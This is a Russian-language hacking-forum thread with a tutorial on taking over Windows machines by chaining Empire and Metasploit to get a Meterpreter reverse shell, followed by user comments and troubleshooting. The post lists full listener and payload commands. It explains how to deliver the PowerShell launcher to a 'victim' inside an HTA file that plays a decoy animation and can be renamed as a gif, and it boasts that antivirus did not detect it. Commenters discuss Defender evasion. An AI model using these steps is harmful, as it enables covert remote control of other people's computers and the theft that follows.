Soft Empire-Metasploit — Хакаем виндовс по новому

Приветик! сегодня покажу как можно хацкнуть windows машину связав 2 инструмента - Empire, и Metasploit.
Я буду юзать машину с заранее установленным Metasploit, проще известный Кали. + Устанавливаем Empire.
Цель: мы будем получать метерпретер сессию используя Empire. Да, да может я поехал, но мне трудно юзать это... Раз в 12 легче юзать более понятный метерпретер. Ну и более скрытно.)

Приступим. Для начала установите Metasploit и Empire если у вас их нет.
EmpireProject/Empire (Empire)
Руководство по установке Metasploit для Linux (Metasploit)
Готово? Теперь открываем 2 окошка с терминалом. В первое пишем.

cd Empire
./empire

Во 2-ом окошке пишем, если у вас не kali первую команду пропускайте.

service postgresql start
msfconsole

В окне с msf пишем.

use exploit/multi/script/web_delivery
set SRVHOST (Ваш локальный ip)
set URIPATH help (В место help можно написать любое слово)
set lhost (Ваш локальный ip или публичный если атака идёт через сеть интернет)
set lport (Любое если идёт в локальной сети, или тот который пробросили)
set target 2 (Это лучше не изменять)
set payload windows/meterpreter/reverse_tcp
exploit -j или же exploit

Должно выглядеть примерно так.

(Знайте если делаете атаку через сеть интернет
то обязательно пробросте порт 8080, а в параметре SRVHOST ваш локальный ip не в зависимости какая атака.)
Готово, теперь переходим к окну с empire, заранее скажу я хз как настроить там атаку через сеть интернет, я не нашёл нужные команды, как можно изменить свой lhost и lport? Отпишите в коменты.)
Пишем...

listeners
uselistener http
execute
listener http
launcher powershell http

Всё у нас есть повершел код и активный слушатель, за вами только доставить этот код на машину, рекомедую это делать с помошью вот этого кодика

Ссылка скрыта от гостей

.


Всё жертва увидит танцы аниме тян, а вы agent в empire.

В строке var payload=""; В кавычки вставляем наш повершел код и сохраняем как hta, можно закриптовать весь код, для большей скрытности, но у меня виндовс 7, 8, 10 не чего не засекли и так. А так же можно назвать наш файл gif и потом поменять, местами название и расширение.)
Продолжаем, теперь выбираем нашего агента.

agents
interact (Имя нашего агента)

Терь скрываем это окошко идём в Metasploit
пишем exploit -j И получаем подобную ссылку "

Ссылка скрыта от гостей

" Если атака через интернет сеть то пишите в места локального айпишника свой публичный. Так

Ссылка скрыта от гостей

Переходим в первое окно, пишем.

usemodule code_execution/invoke_metasploitpayload
set URL (та ссылка которую вы получили)
execute

Усо как видите мы получили метерпретер сессию, сябки за внимание :з

Вдохновитель -

Да, да слизал всё. Но однако же не нашёл этого в текстовом виде, и на русском языке. Решил как-то расписать, может кому помог.

 

[mrOkey]

Скрипткидди стайл

 

[DarkDepth]

Скрипткидди стайл

Прости... Но я что-то, совсем не понял твою мысль....

 

[mrOkey]

Прости... Но я что-то, совсем не понял твою мысль....

Ты пишешь не интересно, у тебя количество сленга на предложение больше, чем количество предложений. Читать не интересно. Это все равно что читать текст который «ээээ бэээ мэээ каааа быыыы» и прочие междометия. Ну и способ довольно старый

 

[DarkDepth]

Ты пишешь не интересно, у тебя количество сленга на предложение больше, чем количество предложений. Читать не интересно. Это все равно что читать текст который «ээээ бэээ мэээ каааа быыыы» и прочие междометия. Ну и способ довольно старый

Спасибо, постараюсь исправиться. )

 

[kravl]

Ты пишешь не интересно, у тебя количество сленга на предложение больше, чем количество предложений. Читать не интересно. Это все равно что читать текст который «ээээ бэээ мэээ каааа быыыы» и прочие междометия. Ну и способ довольно старый

Покажи нам лучше и новее способ. Зачем сразу такие возражения ?) Парень хочет как-то проявить себя и показаться полезным форуму, а ты на него нападаешь.

 

[centr]

Покажи нам лучше и новее способ. Зачем сразу такие возражения ?) Парень хочет как-то проявить себя и показаться полезным форуму, а ты на него нападаешь.

https://codeby.net/tags/mrokey/

 

[DarkDepth]

Покажи нам лучше и новее способ. Зачем сразу такие возражения ?) Парень хочет как-то проявить себя и показаться полезным форуму, а ты на него нападаешь.

Однако, он прав, тема старовата, но её почему-то не прописовали во время активного юзанья, ну а так ещё вроде профит, и встроенные ативари не кричат.)

 

[mrOkey]

И да, на будущее - ты пишешь статью, как бы заявляя, что ты имеешь компетенции в данном вопросе. Иными слова в твоей статье не должно быть фраз по типу «я хз почему так, но это так» ты должен досконально изучить вопрос прежде, чем писать, а вот почему так и так.

 

[Ondrik8]

по новому)))) улыбнул!

 

[LuckyNOOB]

Что-нибудь windwos defender говорил на десятке?

 

[Ondrik8]

Что-нибудь windwos defender говорил на десятке?

конечно скажет! все парни забудьте про реал-хек!))) качайте метасплойтбл и хекайте сами себя!))))

ПС дефедр лютутует! он уже не тот лоховской антик как был раньше...

 

[DarkDepth]

Что-нибудь windwos defender говорил на десятке?

Тебе уже ответели, но вин 7, 8 не ругались, как писал выше.) Тут тебе нада что то своё придумать... Может используя СИ получиться...

 

[diagnostikapc]

при ввводе команды execute выходит ошибка что не может открыть порт 80 и адрес уже занят. хотя данный порт не прослушивается больше никаким сервисом

(Empire: listeners/http) > execute
[*] Starting listener 'http1'
* Serving Flask app "http" (lazy loading)
* Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
* Debug mode: off
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Ensure the folder specified in CertPath exists and contains your pem and private key file.
[!] Listener failed to start!

 

[DarkDepth]

при ввводе команды execute выходит ошибка что не может открыть порт 80 и адрес уже занят. хотя данный порт не прослушивается больше никаким сервисом

(Empire: listeners/http) > execute
[*] Starting listener 'http1'
* Serving Flask app "http" (lazy loading)
* Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
* Debug mode: off
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Listener startup on port 80 failed: [Errno 98] Address already in use
[!] Ensure the folder specified in CertPath exists and contains your pem and private key file.
[!] Listener failed to start!

Хм... Через 20 - 30 минут, посмотрю что может быть.
Что у тебя за ОС?

 

[diagnostikapc]

Хм... Через 20 - 30 минут, посмотрю что может быть.
Что у тебя за ОС?

Kali Linux самая свежая с оф сайта

 

[DarkDepth]

Kali Linux самая свежая с оф сайта

Понял. Ну посмотрю что не так может быть.

 

[diagnostikapc]

Понял. Ну посмотрю что не так может быть.

Спасибо. Жду обратной связи тогда.

 

[DarkDepth]

Спасибо. Жду обратной связи тогда.

Увы... Что то я не чего не заметил...